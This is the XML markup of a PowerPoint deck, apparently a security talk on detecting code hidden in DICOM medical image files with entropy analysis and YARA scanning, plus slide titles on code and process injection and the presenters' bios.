            <a:off x="4830573" y="386082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400" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Limitations of Entropy </a:t>
            </a:r>
            <a:br>
              <a:rPr dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1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0" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4314756" y="5114954"/>
            <a:ext cx="10131120" cy="160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Scanning the entire file can cause False Positives. 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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Code in private tag undetected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557AA2CF-09BE-C832-01A7-BACF2D3D8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966500"/>
            <a:ext cx="4053360" cy="34689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3782800" y="-135739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</a:rPr>
              <a:t>The Remedy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636151" y="3429000"/>
            <a:ext cx="12277769" cy="36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Leveraging YARA to scan the DICOM sections.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Entropy= Faster Preamble Scanning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YARA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>= Private tag scanner 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Quick scan: Only Shannon’s entropy.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Aggressive scan: Both YARA and Shannon’s entropy</a:t>
            </a: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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Combining ENTROPY+ YARA to give better verdicts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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CB4B3-A851-4D6E-B37E-8D093D5A3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9" y="909794"/>
            <a:ext cx="6118053" cy="23450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BE745-5A70-39DF-F9FD-13A6A662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49" y="0"/>
            <a:ext cx="7664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85800" y="609480"/>
            <a:ext cx="10131120" cy="14558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Let’s add some more spice! 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072373036"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="2142000"/>
          <a:ext cx="10131120" cy="36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6691746" y="0"/>
            <a:ext cx="5147280" cy="1641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How do we read this? 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7825856" y="1925225"/>
            <a:ext cx="5147280" cy="363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6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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>DICOM</a:t>
            </a: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lang="en-US" sz="24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649080" y="983520"/>
            <a:ext cx="5446800" cy="4561560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4380"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="50760" cap="sq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6400800" y="609480"/>
            <a:ext cx="5147280" cy="1641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What is DICOM?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5" name="Content Placeholder 4" descr="A group of people in clothing&#10;&#10;Description automatically generated with low confidence"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="10298" b="12078"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1080"/>
            <a:ext cx="6095520" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="2251440"/>
            <a:ext cx="5791200" cy="363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Digital Imaging and Communications In Medicine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Standard format in healthcare to transfer patient data and diagnostic images together.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Patient data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Equipment data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Procedures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7865640" y="643320"/>
            <a:ext cx="3706560" cy="1607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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>PACS unpacked !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643320" y="1096920"/>
            <a:ext cx="6897600" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4380"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="5076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TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865640" y="2251440"/>
            <a:ext cx="3706560" cy="3971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Protocols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C-Store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C-Move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C-WADO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C-Find</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2475000" y="5499360"/>
            <a:ext cx="609552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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Image courtesy : osirix-viewer.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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907713" y="-334080"/>
            <a:ext cx="5666501" cy="1650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cap="all" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>DICOM Reader , The one ! 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685800" y="3009960"/>
            <a:ext cx="3771360" cy="278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Aids in reading </a:t>
            </a:r>
          </a:p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.DCM Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4838760" y="1633320"/>
            <a:ext cx="7271280" cy="3908160"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4380"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="5076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B0842C-84C9-4434-A73E-688A22492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61240" r="22117"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="263701" y="340241"/>
            <a:ext cx="3980519" cy="2658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3EA58-98B9-4801-AB66-AA882D826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4710" r="12210" b="20971"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3360967" y="1926997"/>
            <a:ext cx="5680418" cy="3308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AB49B4-2960-4C2B-9EF7-9C3A1312C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19475" r="14094" b="30337"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365723" y="3211272"/>
            <a:ext cx="3776474" cy="3441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2968CD-833A-4574-AF8D-339A586FB3AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8435082" y="1479478"/>
            <a:ext cx="292813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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B.Tech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in CSE from NIT Trichy ( 2016-2020 )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Edison Engineering Development Program Member at GE Healthcare.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Product Security Analyst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Cricket, Badminton, Meditation.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289AD-4084-4D13-AD23-C748469ADD7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729610" y="893316"/>
            <a:ext cx="330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RAKESH MAHANTHI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4190881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</TotalTime>
  <Words>622</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>144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Source Sans Pro</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Who am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INJECTION ! </vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>LINUX PROCESS INJECTION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Why not get the interpreter? </vt:lpstr>
      <vt:lpstr>The power of shell, the powershell!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Honey, I just put the hospital on the Ventilator</dc:title>
  <dc:subject/>
  <dc:creator>Shyam Sundar</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Shyam Sundar</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-22T08:24:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-10T06:10:43Z</dcterms:modified>
  <dc:language>en-IN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